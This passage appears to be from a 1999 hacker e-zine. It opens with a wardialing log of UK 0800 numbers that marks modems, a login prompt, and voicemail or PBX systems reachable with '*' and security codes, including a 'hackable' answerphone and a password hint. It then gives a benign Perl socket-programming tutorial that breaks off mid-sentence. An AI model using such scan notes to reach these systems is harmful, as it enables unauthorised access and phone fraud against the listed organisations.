]|[-0800-393-570-]|[ dead ]|[-0800-393-571-]|[ dead ]|[-0800-393-572-]|[ not answered ]|[-0800-393-573-]|[ dead ]|[-0800-393-574-]|[ dead ]|[-0800-393-575-]|[ dead ]|[-0800-393-576-]|[ voice, council homewise ]|[-0800-393-577-]|[ not answered ]|[-0800-393-578-]|[ !!!modem/fax!!! (probably fax) ]|[-0800-393-579-]|[ ding ding, voice ]|[-0800-393-580-]|[ somewhere essex, voice, v. quiet ]|[-0800-393-581-]|[ computer ring, they know I'm waiting ]|[-0800-393-582-]|[ cars, voice ]|[-0800-393-583-]|[ dead ]|[-0800-393-584-]|[ not answered ]|[-0800-393-585-]|[ publishing, order some catalog for £9 ]|[-0800-393-586-]|[ dead ]|[-0800-393-587-]|[ skydeals, voice, Claire =] ]|[-0800-393-588-]|[ not recognised ]|[-0800-393-589-]|[ engaged ]|[-0800-393-590-]|[ not answered ]|[-0800-393-591-]|[ dead ]|[-0800-393-592-]|[ get rich quick scheme ]|[-0800-393-593-]|[ not recognised ]|[-0800-393-594-]|[ number has changed to 0800 300 822, which is royal sun alliance special scheme line ]|[-0800-393-595-]|[ not answered ]|[-0800-393-596-]|[ not answered ]|[-0800-393-597-]|[ covercare, answerfone ]|[-0800-393-598-]|[ AIG life, press # ]|[-0800-393-599-]|[ !!!modem/fax!!! (probably fax) ]|[-0800-393-600-]|[ not answered ]|[-0800-393-601-]|[ VMS ]|[-0800-393-602-]|[ voice ]|[-0800-393-603-]|[ !!!carrier!!! ]|[-0800-393-604-]|[ posh, PPC ]|[-0800-393-605-]|[ !!!modem/fax!!! (fax) ]|[-0800-393-606-]|[ not answered ]|[-0800-393-607-]|[ not answered ]|[-0800-393-608-]|[ not recognised ]|[-0800-393-609-]|[ not recognised ]|[-0800-393-610-]|[ not answered ]|[-0800-393-611-]|[ not answered ]|[-0800-393-612-]|[ not answered ]|[-0800-393-613-]|[ dead ]|[-0800-393-614-]|[ taxi service ]|[-0800-393-615-]|[ not answered ]|[-0800-393-616-]|[ voice ]|[-0800-393-617-]|[ !!!modem/fax!!! (fax) ]|[-0800-393-618-]|[ dead ]|[-0800-393-619-]|[ not recognised ]|[-0800-393-620-]|[ not answered ]|[-0800-393-621-]|[ dead ]|[-0800-393-622-]|[ voice, 'hello?' ]|[-0800-393-623-]|[ dead ]|[-0800-393-624-]|[ not answered ]|[-0800-393-625-]|[ dead ]|[-0800-393-626-]|[ not answered ]|[-0800-393-627-]|[ not answered ]|[-0800-393-628-]|[ not answered, d'you know, sometimes I could cry. ]|[-0800-393-629-]|[ HW, voice (finally) ]|[-0800-393-630-]|[ dead ]|[-0800-393-631-]|[ voice ]|[-0800-393-632-]|[ not answered ]|[-0800-393-633-]|[ dead ]|[-0800-393-634-]|[ voice, healthline ]|[-0800-393-635-]|[ !!!modem/fax!!! (fax) ]|[-0800-393-636-]|[ dead ]|[-0800-393-637-]|[ voice, tread windows and doors ]|[-0800-393-638-]|[ not accepting anon calls...hmmm... ]|[-0800-393-639-]|[ dead ]|[-0800-393-640-]|[ not answered ]|[-0800-393-641-]|[ voice ]|[-0800-393-642-]|[ dead ]|[-0800-393-643-]|[ answerfone ]|[-0800-393-644-]|[ not answered ]|[-0800-393-645-]|[ not answered ]|[-0800-393-646-]|[ scratchy answerfone ]|[-0800-393-647-]|[ dead ]|[-0800-393-648-]|[ not answered ]|[-0800-393-649-]|[ engaged ]|[-0800-393-650-]|[ dead ]|[-0800-393-651-]|[ dead ]|[-0800-393-652-]|[ dead ]|[-0800-393-653-]|[ answerfone ]|[-0800-393-654-]|[ BT interactive help desk, oooooohhhh! ]|[-0800-393-655-]|[ voice, cornish conservatories ]|[-0800-393-656-]|[ the original Mr. Bean company, voice ]|[-0800-393-657-]|[ dead ]|[-0800-393-658-]|[ dead ]|[-0800-393-659-]|[ not answered ]|[-0800-393-660-]|[ not answered ]|[-0800-393-661-]|[ not available ]|[-0800-393-662-]|[ voice, asking for my name ]|[-0800-393-663-]|[ changed to 0141 305 5000 ]|[-0800-393-664-]|[ voice, RTA ]|[-0800-393-665-]|[ voice ]|[-0800-393-666-]|[ dead, hoping it was hell helpline or something =[ ]|[-0800-393-667-]|[ voice, transmissions ]|[-0800-393-668-]|[ dead ]|[-0800-393-669-]|[ loft conversions answerfones ]|[-0800-393-670-]|[ dead ]|[-0800-393-671-]|[ not recognised ]|[-0800-393-672-]|[ not answered ]|[-0800-393-673-]|[ answerfone ]|[-0800-393-674-]|[ not answered ]|[-0800-393-675-]|[ dead ]|[-0800-393-676-]|[ dead ]|[-0800-393-677-]|[ voice, canada live ]|[-0800-393-678-]|[ dead ]|[-0800-393-679-]|[ dead ]|[-0800-393-680-]|[ dead ]|[-0800-393-681-]|[ voice, skip hire ]|[-0800-393-682-]|[ dead ]|[-0800-393-683-]|[ dead ]|[-0800-393-684-]|[ dead ]|[-0800-393-685-]|[ dead ]|[-0800-393-686-]|[ muffled answerfone, play with * and # ]|[-0800-393-687-]|[ dead ]|[-0800-393-688-]|[ not available ]|[-0800-393-689-]|[ voice ]|[-0800-393-690-]|[ dead ]|[-0800-393-691-]|[ dead ]|[-0800-393-692-]|[ not answered ]|[-0800-393-693-]|[ not answered ]|[-0800-393-694-]|[ dead ]|[-0800-393-695-]|[ dead ]|[-0800-393-696-]|[ not answered ]|[-0800-393-697-]|[ dead ]|[-0800-393-698-]|[ voice ]|[-0800-393-699-]|[ dead ]|[-0800-393-700-]|[ dead ]|[-0800-393-701-]|[ the service cannot be connected ]|[-0800-393-702-]|[ BT answering service ]|[-0800-393-703-]|[ dead ]|[-0800-393-704-]|[ answerfone, * cuts you off ]|[-0800-393-705-]|[ service no longer available, but press #, it pauses, then cuts dead... ]|[-0800-393-706-]|[ not recognised ]|[-0800-393-707-]|[ not answered ]|[-0800-393-708-]|[ voice ]|[-0800-393-709-]|[ not answered ]|[-0800-393-710-]|[ Truelink answerfone ]|[-0800-393-711-]|[ some district council answering service, press # and it says 'bye' =] ]|[-0800-393-712-]|[ dead ]|[-0800-393-713-]|[ not answered ]|[-0800-393-714-]|[ Construction liason department for the North West ]|[-0800-393-715-]|[ call can't be taken, press #, ** and enter your security code ]|[-0800-393-716-]|[ voice ]|[-0800-393-717-]|[ voice ]|[-0800-393-718-]|[ not been recognised ]|[-0800-393-719-]|[ voice ]|[-0800-393-720-]|[ voice ]|[-0800-393-721-]|[ not answered ]|[-0800-393-722-]|[ engaged ]|[-0800-393-723-]|[ !!!modem!!!(fax) ]|[-0800-393-724-]|[ not answered ]|[-0800-393-725-]|[ dead ]|[-0800-393-726-]|[ not answered ]|[-0800-393-727-]|[ not answered ]|[-0800-393-728-]|[ not recognised ]|[-0800-393-729-]|[ dead ]|[-0800-393-730-]|[ dead ]|[-0800-393-731-]|[ dead ]|[-0800-393-732-]|[ not answered(to be honest, if it doesn't pick up in 5 rings, it's probably human) ]|[-0800-393-733-]|[ dead ]|[-0800-393-734-]|[ dead ]|[-0800-393-735-]|[ Central Regional Council ]|[-0800-393-736-]|[ voice ]|[-0800-393-737-]|[ voice, chirpy person =[ ]|[-0800-393-738-]|[ wierd modem ]|[-0800-393-739-]|[ dead ]|[-0800-393-740-]|[ dead ]|[-0800-393-741-]|[ !!!modem!!!(fax) ]|[-0800-393-742-]|[ not answered ]|[-0800-393-743-]|[ answerfone, press * and enter security code ]|[-0800-393-744-]|[ not answered ]|[-0800-393-745-]|[ voice ]|[-0800-393-746-]|[ not answered ]|[-0800-393-747-]|[ hidden behind answerfone --> oooh, press * and get mailbox 243, loads more boxes about ]|[-0800-393-748-]|[ dead pass=123 ]|[-0800-393-749-]|[ dead ]|[-0800-393-750-]|[ engaged ]|[-0800-393-751-]|[ dead ]|[-0800-393-752-]|[ not answered ]|[-0800-393-753-]|[ voice ]|[-0800-393-754-]|[ dead ]|[-0800-393-755-]|[ voice ]|[-0800-393-756-]|[ not recognised ]|[-0800-393-757-]|[ BT mailbox, loads of others for use ]|[-0800-393-758-]|[ same ]|[-0800-393-759-]|[ !!!modem!!!(fax) ]|[-0800-393-760-]|[ answerfone, security code, etc ]|[-0800-393-761-]|[ not answered ]|[-0800-393-762-]|[ dead ]|[-0800-393-763-]|[ dead ]|[-0800-393-764-]|[ voice ]|[-0800-393-765-]|[ not answered ]|[-0800-393-766-]|[ not answered ]|[-0800-393-767-]|[ dead ]|[-0800-393-768-]|[ poor quality, voice ]|[-0800-393-769-]|[ not recognised ]|[-0800-393-770-]|[ dead ]|[-0800-393-771-]|[ engaged ]|[-0800-393-772-]|[ dead ]|[-0800-393-773-]|[ dead ]|[-0800-393-774-]|[ hm, press * get mailbox stuff (3 digits), maybe outdial ]|[-0800-393-775-]|[ press *, enter security code ]|[-0800-393-776-]|[ not answered ]|[-0800-393-777-]|[ Standard Life Investments VMS/PBX ]|[-0800-393-778-]|[ dead ]|[-0800-393-779-]|[ not answered ]|[-0800-393-780-]|[ shit, arse gone dead. Some communications line ]|[-0800-393-781-]|[ !!!modem!!!(fax) ]|[-0800-393-782-]|[ dead ]|[-0800-393-783-]|[ not answered ]|[-0800-393-784-]|[ voice, 'hullo?' ]|[-0800-393-785-]|[ National Windscreens helpline ]|[-0800-393-786-]|[ voice ]|[-0800-393-787-]|[ voice ]|[-0800-393-788-]|[ dead ]|[-0800-393-789-]|[ dead ]|[-0800-393-790-]|[ !!!modem!!!(fax) ]|[-0800-393-791-]|[ dead ]|[-0800-393-792-]|[ voice ]|[-0800-393-793-]|[ pause, then dead ]|[-0800-393-794-]|[ voice ]|[-0800-393-795-]|[ not answered ]|[-0800-393-796-]|[ dead ]|[-0800-393-797-]|[ answerfone ]|[-0800-393-798-]|[ same answerfone ]|[-0800-393-799-]|[ not answered ]|[-0800-393-800-]|[ dead ]|[-0800-393-801-]|[ extension 1160, VMB ]|[-0800-393-802-]|[ not answered ]|[-0800-393-803-]|[ not answered ]|[-0800-393-804-]|[ voice ]|[-0800-393-805-]|[ dead ]|[-0800-393-806-]|[ dead ]|[-0800-393-807-]|[ dead ]|[-0800-393-808-]|[ dead ]|[-0800-393-809-]|[ dead ]|[-0800-393-810-]|[ voice, Great Western Railways ]|[-0800-393-811-]|[ Welsh tax advising answerfone ]|[-0800-393-812-]|[ crash course in Judaism... answerfone with fax option ]|[-0800-393-813-]|[ voice ]|[-0800-393-814-]|[ dead ]|[-0800-393-815-]|[ dead ]|[-0800-393-816-]|[ dead ]|[-0800-393-817-]|[ AC television answerfone ]|[-0800-393-818-]|[ dead ]|[-0800-393-819-]|[ not answered ]|[-0800-393-820-]|[ dead ]|[-0800-393-821-]|[ !!!modem!!!(fax) ]|[-0800-393-822-]|[ dead ]|[-0800-393-823-]|[ dead ]|[-0800-393-824-]|[ dead ]|[-0800-393-825-]|[ forwarded to VMB 35482 ]|[-0800-393-826-]|[ dead ]|[-0800-393-827-]|[ voice ]|[-0800-393-828-]|[ voice ]|[-0800-393-829-]|[ dead ]|[-0800-393-830-]|[ not answered ]|[-0800-393-831-]|[ office answerfone ]|[-0800-393-832-]|[ voice ]|[-0800-393-833-]|[ not answered ]|[-0800-393-834-]|[ !!!modem!!! Enter Username>Enter Passcode> Xyplex -020- Logged out port 6 on server TSLODC2 at 08 Jul 1999 07:24:54 odd, it's the 7th today, and it's 08:24:54 ]|[-0800-393-835-]|[ dead ]|[-0800-393-836-]|[ not available ]|[-0800-393-837-]|[ answerfone ]|[-0800-393-838-]|[ dead ]|[-0800-393-839-]|[ some automated thing ]|[-0800-393-840-]|[ linked to a mobile... (maybe switched off) ]|[-0800-393-841-]|[ voice, too happy ]|[-0800-393-842-]|[ dead ]|[-0800-393-843-]|[ voice ]|[-0800-393-844-]|[ not recognised ]|[-0800-393-845-]|[ dead ]|[-0800-393-846-]|[ not answered ]|[-0800-393-847-]|[ not available ]|[-0800-393-848-]|[ not answered ]|[-0800-393-849-]|[ dead ]|[-0800-393-850-]|[ engaged ]|[-0800-393-851-]|[ not answered ]|[-0800-393-852-]|[ dead ]|[-0800-393-853-]|[ not answered ]|[-0800-393-854-]|[ not recognised ]|[-0800-393-855-]|[ voice ]|[-0800-393-856-]|[ dead ]|[-0800-393-857-]|[ Diane Crabb hackable answerfone ]|[-0800-393-858-]|[ press *, then 81 to login ]|[-0800-393-859-]|[ not answered ]|[-0800-393-860-]|[ dead ]|[-0800-393-861-]|[ dead ]|[-0800-393-862-]|[ dead ]|[-0800-393-863-]|[ not answered ]|[-0800-393-864-]|[ not answered ]|[-0800-393-865-]|[ !!!modem!!! ]|[-0800-393-866-]|[ answerfone ]|[-0800-393-867-]|[ not recognised ]|[-0800-393-868-]|[ changed to 01892 546 132 ]|[-0800-393-869-]|[ voice ]|[-0800-393-870-]|[ not recognised ]|[-0800-393-871-]|[ voice ]|[-0800-393-872-]|[ dead ]|[-0800-393-873-]|[ voice, 226 ]|[-0800-393-874-]|[ voice, crown ]|[-0800-393-875-]|[ dead ]|[-0800-393-876-]|[ voice, foreign ]|[-0800-393-877-]|[ voice, 'where the hell's good morning?' ]|[-0800-393-878-]|[ avon locks, voice ]|[-0800-393-879-]|[ dead ]|[-0800-393-880-]|[ dead ]|[-0800-393-881-]|[ dead ]|[-0800-393-882-]|[ voice ]|[-0800-393-883-]|[ voice ]|[-0800-393-884-]|[ voice ]|[-0800-393-885-]|[ dead ]|[-0800-393-886-]|[ not answered ]|[-0800-393-887-]|[ dead ]|[-0800-393-888-]|[ voice ]|[-0800-393-889-]|[ answerfone ]|[-0800-393-890-]|[ nene housing society answerfone ]|[-0800-393-891-]|[ answerfone ]|[-0800-393-892-]|[ 'The number you have dialed is not in service'<--not official voice... ]|[-0800-393-893-]|[ same ]|[-0800-393-894-]|[ not answered ]|[-0800-393-895-]|[ voice ]|[-0800-393-896-]|[ not available ]|[-0800-393-897-]|[ voice ]|[-0800-393-898-]|[ voice ]|[-0800-393-899-]|[ voice ]|[-0800-393-900-]|[ voice, party movers ]|[-0800-393-901-]|[ dead ]|[-0800-393-902-]|[ not recognised ]|[-0800-393-903-]|[ voice ]|[-0800-393-904-]|[ voice ]|[-0800-393-905-]|[ voice ]|[-0800-393-906-]|[ !!!modem!!!(fax) ]|[-0800-393-907-]|[ voice ]|[-0800-393-908-]|[ voice ]|[-0800-393-909-]|[ voice ]|[-0800-393-910-]|[ not available ]|[-0800-393-911-]|[ dead ]|[-0800-393-912-]|[ voice ]|[-0800-393-913-]|[ not recognised ]|[-0800-393-914-]|[ dead ]|[-0800-393-915-]|[ dead ]|[-0800-393-916-]|[ dead ]|[-0800-393-917-]|[ dead ]|[-0800-393-918-]|[ voice ]|[-0800-393-919-]|[ voice ]|[-0800-393-920-]|[ voice ]|[-0800-393-921-]|[ dead ]|[-0800-393-922-]|[ voice ]|[-0800-393-923-]|[ dead ]|[-0800-393-924-]|[ !!!modem!!!(fax) ]|[-0800-393-925-]|[ voice ]|[-0800-393-926-]|[ PBX ]|[-0800-393-927-]|[ dead ]|[-0800-393-928-]|[ dead ]|[-0800-393-929-]|[ dead ]|[-0800-393-930-]|[ voice ]|[-0800-393-931-]|[ dead ]|[-0800-393-932-]|[ dead ]|[-0800-393-933-]|[ voice ]|[-0800-393-934-]|[ dead ]|[-0800-393-935-]|[ not answered ]|[-0800-393-936-]|[ dead ]|[-0800-393-937-]|[ voice ]|[-0800-393-938-]|[ voice ]|[-0800-393-939-]|[ Cable & wireless Telephone account management =P ]|[-0800-393-940-]|[ voice ]|[-0800-393-941-]|[ voice ]|[-0800-393-942-]|[ dead ]|[-0800-393-943-]|[ voice ]|[-0800-393-944-]|[ voice ]|[-0800-393-945-]|[ dead ]|[-0800-393-946-]|[ voice ]|[-0800-393-947-]|[ voice ]|[-0800-393-948-]|[ voice ]|[-0800-393-949-]|[ voice ]|[-0800-393-950-]|[ not recognised ]|[-0800-393-951-]|[ dead ]|[-0800-393-952-]|[ !!!modem!!! ]|[-0800-393-953-]|[ voice ]|[-0800-393-954-]|[ dead ]|[-0800-393-955-]|[ changed to 01303 212 050 ]|[-0800-393-956-]|[ not recognised ]|[-0800-393-957-]|[ not answered ]|[-0800-393-958-]|[ voice ]|[-0800-393-959-]|[ dead ]|[-0800-393-960-]|[ dead ]|[-0800-393-961-]|[ voice ]|[-0800-393-962-]|[ dead ]|[-0800-393-963-]|[ dead ]|[-0800-393-964-]|[ voice ]|[-0800-393-965-]|[ dead ]|[-0800-393-966-]|[ not answered ]|[-0800-393-967-]|[ voice ]|[-0800-393-968-]|[ not recognised ]|[-0800-393-969-]|[ voice ]|[-0800-393-970-]|[ voice ]|[-0800-393-971-]|[ not answered ]|[-0800-393-972-]|[ not answered ]|[-0800-393-973-]|[ voice ]|[-0800-393-974-]|[ the service cannot be connected ]|[-0800-393-975-]|[ !!!modem!!!(fax) ]|[-0800-393-976-]|[ !!!modem!!!(fax) ]|[-0800-393-977-]|[ voice ]|[-0800-393-978-]|[ dead ]|[-0800-393-979-]|[ voice ]|[-0800-393-980-]|[ voice ]|[-0800-393-981-]|[ dead ]|[-0800-393-982-]|[ engaged ]|[-0800-393-983-]|[ !!!modem!!! ]|[-0800-393-984-]|[ not answered ]|[-0800-393-985-]|[ dead ]|[-0800-393-986-]|[ dead ]|[-0800-393-987-]|[ voice ]|[-0800-393-988-]|[ dead ]|[-0800-393-989-]|[ voice ]|[-0800-393-990-]|[ dead ]|[-0800-393-991-]|[ dead ]|[-0800-393-992-]|[ dead ]|[-0800-393-993-]|[ voice ]|[-0800-393-994-]|[ voice ]|[-0800-393-995-]|[ dead ]|[-0800-393-996-]|[ not answered ]|[-0800-393-997-]|[ voice, deep ]|[-0800-393-998-]|[ voice ]|[-0800-393-999-]|[ dead -->[OO]:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: -->]OO[:[ Network Programming ]::[OO--[ by z0mba ]--[ zomba@epidemik.org ]::: -->[OO]:::::::::::::::::::::::::::::::[ New site up s00n ]::: Woah, f41th 8 is looking pretty leet so far, so I thought i'd add to it with another k-rad uber el8 article, as promised. Now I know I said that I was gonna write an article on setting up an FTP server, but I thought this was both more interesting and more f41th stylee, but I may write the FTP article for a later issue of f41th, who knows. All I ask of you in return for me giving you no-day network programming tekniq is your un-told gratitude and of course all of your c0dez, just email them to the above address, heh. Introduction ------------ One of the things that a lot of people ask when confronted with lots of computers linked together is "How do computers actually communicate over a network?". This article should explain this to you and also give you some physical examples. Networking and Linux are a perfect combination because linux is an OS that was born from the internet, mainly because its makers had to (and still do) communicate over the internet using e-mail, usenet and the WWW. Also, Linux is based on UNIX which is where most of the fundamentals of networking originate from anyway. Linux is an excellent platform for network programming because it has mature and full functional networking features. Also, because Linux provides full support for the sockets interface, most programs developed on other version of *nix will build and run on Linux with little or no alterations. Documentation about UNIX networking is fully applicable to Linux as well. In this article I have used Perl to introduce network programming which is quite convenient considering my last article was about Perl, so if you don't know the basic concepts of Perl, go read that first. The reason for using perl is that you can focus on network programming concepts rather than application development issues and programming environments. Only basic knowledge of Perl is required to follow my exanples (wh1ch 1s why j3w sh0uld g0 r34d my 0th3r 4rt1cl3), and they are certainly clear enough for C/C++ programmers to follow (at least I hope they are). This article is intended to serve as an introduction to network programming, so it doesn't cover deeper topics such as protocol layering and routing, but if your that interested you should go buy a book or look for more tutorials on the web. Right then, lets get on with the file... Networking Concepts =================== This section is to basically cover the fundamentals of networking, so pay attention (3sp3c14lly j3w l4m3rs). You will learn what the the necessary components of network communication are and how a program uses them to build a connection by following a simple program that retrieves networking information and uses it to connect to another program. You should by the end, have a pretty good understanding of network addresses, sockets and the diffs between TCP and UDP. Below is a simple program that uses a Perl function that creates a connection to the server using TCP (makeconn), this function can be found in network.pl which is included in the f41th 8 .zip file. 1: sub makeconn { 2: 3: my ($host, $portname, $server, $port, $proto, $servaddr); 4: 5: $host = $_[0]; 6: $portname = $_[1]; 7: 8: # 9: # Server hostname, port and protocol 10: # 11: $server = gethostbyname($host) or 12: die "gethostbyname: cannot locate host: $!"; 13: $port = getservbyname($portname, 'tcp') or 14: die "getservbyname: cannot get port: $!"; 15: $proto = getprotobyname('tcp') or 16: die "getprotobyname: cannot get proto: $!"; 17: 18: # 19: # Build an inet address 20: # 21: $servaddr = sockaddr_in($port, $server); 22: 23: 24: # 25: # Create the socket and connect it 26: # 27: socket(CONNFD, PF_INET, SOCK_STREAM, $proto); 28: connect(CONNFD, $servaddr) or die "connect: $!"; 29: 30: return CONNFD; 31: } This procedure can be summerised in three basic steps: o--> Build and address. o--> Create a socket. o--> Establish a connection. The network address is built by retrieving address information in lines 11 13, and then assembling it in line 21. In line 27, you create the socket using protocol information retrieved in line 15. In line 28 you finally establish the connection. Building Network Addresses -------------------------- The steps involved in building a network address and connecting to it provide a framework for observing how network communication werks. I'll spend some time covering each part of this process in order to better prepare you for the tutorials later on. If you've ever configured a PC or workstation for Internet connectivity, you have probably seen an IP address (y3s, 3v3n j00 l4m3rs) similar to 192.9.200. 10 or 10.7.8.14. This is called 'dotted-decimal format' and like many things in computing, is a representation of network addresses that are intended to make things easier for humans to read. The notation that computers, routers and other internet devices actually use to communicate is a 32-bit number, often called a 'canonical address'. When this number is evaluated, it is broken down into four smaller 8-bit (one byte) values, much the way the dotted-decimal format consists of four numbers seperated by decimals. An 'internetwork', or 'internet' for short, consists of two or more networks that are connected. Of course this refers to any two networks connected to each other, not *the* Internet (I kn0w th4t d1s c0nfus3s s0m3 0f j00 l4m3rs). The internet protocol (IP) was designed with this sort of topology in mind (ie: millions of computers). In order for an internet address to be useful, it has to be capable of identifying not only a specific node (c0mput3r), but also which network it resides on. Both bits of information are provided in the 32-bit address. Which portion of the address is related to each component is decided by the 'netmask' that is applied to the address. Depending on an organisations needs, a network architect can decide to have more networks or more addresses. For details on subnetting networks do some searches for TCP/IP Network Management or something along those lines. For the sake of network programming, its enuff to know the information stored in an internet address and that individual workstation netmasks have to be correct in order for a message to be successfully delivered. Dotted-decimal format is easier to read than 32-bit values, but even so, most ppl would rather use names than numbers because wikkid or www.hackernews.com is a lot easier to remember than 12.145.27.2 or 192.148.252.39. For this reason, the notion of hostnames, domain names, and the domain name system were invented. You can get access to a database of name-to-number mappings through a set of 'network library functions', which provide host (n0de) information in response to names ro numbers. For example, in line 11 of the makeconn listing above, you retrieve the address associated with a name with one of these functions - gethostbyname(). Depending on the host configuration, gethostbyname() can retrieve the address associated with a name from a file, /etc/hosts, from the Domain Name System (DNS), or from the Network Information System (NIS or Yellow Pages). DNS and NIS are network-wide-services that administrators use to implify network configuration because adding and updating network address numbers from a central location (and maybe a backup location) is obviously a lot easier than updating files on every workstation individually. These systems are also useful for internetworks because the address of a remote host can be determined when it is needed by making a DNS request, rather than needing to exchange configuration files in advance. One other advantage of using names is that the address that a name is associated with can be changed without affecting applications because the application need only know the name, the address can be discovered at runtime. The following perl script illustrates the use of the gethostbyname() function and the difference between dotted-decimal formatted addresses and canonical address (type it up and save it as 'resolv'): 1: #!/bin/perl 2: use Socket; 3: $addr = gethostbyname($ARGV[0]); 4: $dotfmt = inet_ntoa($addr); 5: print "$ARGV[0]: numeric $addr dotted: $dotfmt\n"; Line 2 includes the Socket module included with Perl 5 distributions. This module is required for all the sample code included in this article. When you run this program, passing it a hostname that you want to see info on, you will se something like this: zomba@noday$ ./resolv www.attrition.org www.attrition.org: numeric: [unprintable characters] dotted: 128.11.253.197 Line 3 passes the name specified on the command line to gethostbyname(), which places the canonical address in $addr. This address is then passed to inet_ntoa(), which returns the same address in dotted-decimal format. (inet_ntoa is an abbreviation for internet number to ASCII). You then print both numbers out in line 5. As you can see, the 32-bit address looks pretty damn weird when printed. Network Services ---------------- Being able to locate a computer is a fundamental part of network communication, but it is not the only necessary component in an address. Why do you want to contact a specific host? Do you want to retrieve an HTML doc from it? Do you want to log in and check mail?. Most workstations, especially those running Linux or any other version of UNIX, provide more thna one service to other nodes on a network. Back in line 13 of the makeconn listing, a function called getservbyname() was called. This function provides the other value used to form the complete network address. This value, referred to as the 'service port number', is the portion of the address that specifies the service or program that you want to communicate with. Like host addresses, service ports can be referred to by name instead of number. getservbyname() retrieves the number associated with the name specified from the file /etc/services. (if NIS is available, the number can also be retrieved from a network database). Port numbers that are listed in this database are called 'well-known ports' because, in theory, any host can connect to one of these services on any other because the numbers at least ought to remain consistant. The port numbers that are used by applications don't have to be listed in or retrieved from this database, it's just considered a good idea to list them in /etc/services and share them in order to prevent conflicts. After you have retrieved the two components necessary to build a fully qualified address, you provide them to the sockaddr_in function, which builds a SOCKADDR_IN structure for us. SOCKADDR_IN is the programmatic representation of a network address needed for most socket system calls. Sockets ------- Before you can use your addressing information you need a socket. The socket() function in line 27 of the makeconn listing illustrates how to create one. Some simple explanations of what sockets are and the types available to a program first will help explain the function. 'Sockets' are an Application Running Interface (API) used for network communication. This API was first available for BSD UNIX for the VAX architecture in the early eighties, but is now used on almost all UNIX versions and Microshaft, being late as always has also recently added them to Windows. System V UNIX has a different interface called the Transport Layer Interface (TLI), but even most system V UNIX version, such as Solaris 2.x, provide socket interfaces. Linux provides a full implementation of the socket interface. Socket applications treat network connections, or to be more exact, network 'endpoints', the same way most UNIX interfaces are handled - as file handles. The reason for the endpoint qualification is simple: Not all network sessions are connected, and referring to all network streams as connections can be incorrect and misleading. As a matter of fact, after a network endpoint is created and bound and/or connected, it can be written to, read from, and destroyed using the same functions as files. Because of this interface, socket programs tend to be portable between different version of UNIX and frequently many other OS's. Protocols and Socket Types -------------------------- The socket API is designed to support multiple protocols, called 'domains' or 'families'. Most UNIX versions support at least two domains: UNIX and Internet. (Two of the other domains are Xerox Network system and ISO protocol suite). UNIX domain sockets use the local workstation filesystem to provide communication between programs running on the same workstation only. Internet domain sockets use the Internet Protocol (IP) suite to communicate over the network. As you might guess, this file is concerned with Internet domain sockets. In the following call to socket(), you specify the scaler variable that you want to have the socket descriptor stored in and three values that describe the type of socket you want to have created - the protocol family, the socket type, and the protocol. I've already covered which protocol family you will use which is PF_INET, for the Internet: socket(CONNFD, PF_INET, SOCK_STREAM, $proto); The possible socket types are SOCK_STREAM, SOCK_DGRAM, SOCK_RAW, SOCK_RDM and SOCK_SEQPACKET. The last three are used for low level, advanced operations and are beyond the scope of this article. SOCK_STREAM sockets are connected at both ends, they are reliable, and the messages between them are sequenced. When I say reliable I don't mean that if it says it'll pick the kids up from skewl then it will kind of reliable, I mean that the network guarantees delivery: An application can write a packet with the understanding that it will arrive at the other end, unless the connection is suddenly broken by some unforeseen event, like some twat pulling the power cord on the host machine.. In the event that the connection is broken, the application will receive timely notification. Sequencing means that all messages are delivered to the other application in the exact order that they are sent. SOCK_DGRAM sockets support connectionless and unreliable datagrams. A 'datagram' is typically a fixed-length small message. Applications ahve no guarantee that datagrams will be delivered, or the order they will arive in. On the surface, it seems that no application would ever want to use SOCK_DGRAM, but as you will see, many applications do for good reasons. The type of socket is very closely related to the protocol that is used. In the case of the Internet suite, SOCK_STREAM sockets always implement TCP, and SOCK_DGRAM sockets implement UDP. The characteristics of the TCP protocol match the characteristics of SOCK_STREAM. TCP packets are guarunteed to be delivered except in a network disaster, such as the workstation on the other end of the connection dropping out, or the network itself suffering a serious, unrecoverable outage. Packets are always delivered in the same order that they are written. Obviously, these properties make the job of a network developer very easy because a message and pretty much forgotten about, but as always, there is a cost. TCP messages are much more expensive (demanding) than UDP messages in terms of both network and computing resources. The workstations at both ends of a session have to confirm that they have received the correct information, which results in more work for the operating system and more network traffic. The systems also have to track the order in which the messages were sent, and often have to store messages until others arrive, depending on the state of the network "terrain" between the two workstations. (New messages can arrive while others are being retransmitted because of an error). In addition, the fact that TCP connections are just that, connections, means that they have a price. Every conversation has an endpoint associated with it, so a server that has more than one client has to switch between multiple sockets, which can be very difficult (have a look at the section on I/O Multiplexing with TCP covered later on in this article). UDP, like SOCK_DGRAM, is connectionless and unreliable. Applications have to provide whatever reliability mechanisms are necessary for the job that they are performing. For some applications, that is an advantage because all of the mechanisms provided by TCP aren't always needed. For example, DNS, which uses UDP, simply sends a message and wiats for a response for a predetermined interval, because DNS is a one-to-one message-to-response protocol, sequencing between client and server is not necessary. UDP is connectionless, so a server can use one socket to communicate with many clients. All clients write to the same address for the server, and the server responds individually bu writing to specific client addresses. UDP messages can also be broadcast to entire networks, which is a blessing to the application that needs to communicate one message to many users, but a curse for the workstations that don't need the message but have to read it in order to figure out that its not actually meant for them afterall. The ability to broadcast messages over UDP and the fact that the connectionless aspect of UDP makes it difficult to verify the source of messages are two of the reason why many networking people consider the protocol to be a security risk and dislike even enabling it within their organisations. Making a Connection ------------------- Logically, if you are creating a connection like that of the makeconn() function listed earlier, you need to create a SOCK_STREAM socket with the TCP protocol information retrieved with getprotobyname() in line 15. Take a look at lines 27 and 28 from that listing repeated below: 27: socket(CONNFD, PF_INET, SOCK_STREAM, $proto); 28: connect(CONNFD, $servaddr) or die "connect: $!"; After creating the socket in line 27, you then pass it to connect() with the address structure created by sockaddr_in(). The connect() function actually contacts the address specified in the structure and establishes the virtual circuit supported by TCP. A TCP Client Example -------------------- The following listing puts makeconn() to work in a sample program. This should be typed up in vi and saved as 'client1'. #!/usr/bin/perl use Socket; require "./network.pl"; $NETFD = makeconn($ARGV[0], $ARGV[1]); # # Get the message # sysread $NETFD, $message, 32768 or die "error getting message : $!"; print "$message \n"; close $NETFD; Run this program with two command-line arguments, the name of a Linux host that is running sendmail and the email port number, smtp: zomba@poo$ ./client1 brown smtp 220 brown.poo.com ESMTP Sendmail 8.8.5/8.8.5; Sat, 20 Jun 1999 18:24:08 -0400 This program uses makeconn() to connect to the sendmail program running on the named host and reads the greeting that it sends to a new client when it first connects, using the sysread() function. sysread() is one of the functions used for exstracting network messages from sockets. It is a wrapper for the UNIX read() system call. You cannot use the Perl read() function because it is designed for standard I/O, which uses buffering and other high-level features that interfere with network communications. In a 